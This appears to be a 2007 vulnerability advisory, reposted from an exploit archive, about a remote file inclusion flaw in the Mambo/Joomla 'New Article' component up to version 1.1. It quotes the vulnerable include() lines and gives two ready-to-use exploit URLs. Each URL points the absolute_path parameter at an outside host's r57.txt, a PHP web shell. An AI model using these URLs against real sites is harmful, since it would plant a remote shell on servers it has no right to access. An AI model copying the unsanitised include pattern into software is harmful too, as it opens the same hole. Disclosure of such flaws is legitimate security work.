Security Advisory: Mambo/Joomla Component New Article Component <= 1.1 (absolute_path) Multiple RFI

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  CreaDirectory v1.2 Remote SQL Injection Vulnerability
  osp <= 1.2.1 (cfgPathToProject
Admin) Remote File Include Vulnerablities
  AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities
  StoreFront for Gallery (GALLERY_BASEDIR)
Remote File Inclusion Vulnerabilities

From: Cold Zero <c.o.1.d.0_(at)_hotmail.com>
Date: 19.04.2007
Subject: Mambo/Joomla Component New Article Component <= 1.1 (absolute_path) Multiple RFI

=======================================================
Mambo/Joomla Component New Article Component <= 1.1 (absolute_path) Multiple
RFI
=======================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
=======================================================
Homepage: www.Hack-Teach.com
=======================================================
Script Site :
http://www.jxdevelopment.com/component/option,com_remository/Itemid,0/func,
fileinfo/id,4/
==============================================
File : /components/com_articles.php
include($absolute_path.'/language/'.$lang.'/lang_com_articles.
php');     <=
Line 65
======
http://site/joomla_path/components/com_articles.php?absolute_path=http://nachrichtenmann.de/r57.txt?
========================================================
File : /classes/html/com_articles.php
include($absolute_path.'/language/'.$lang.'/lang_articles.
php');     <= Line
24
======
http://site/joomla_path/classes/html/com_articles.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=========================================================

#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-14]

test server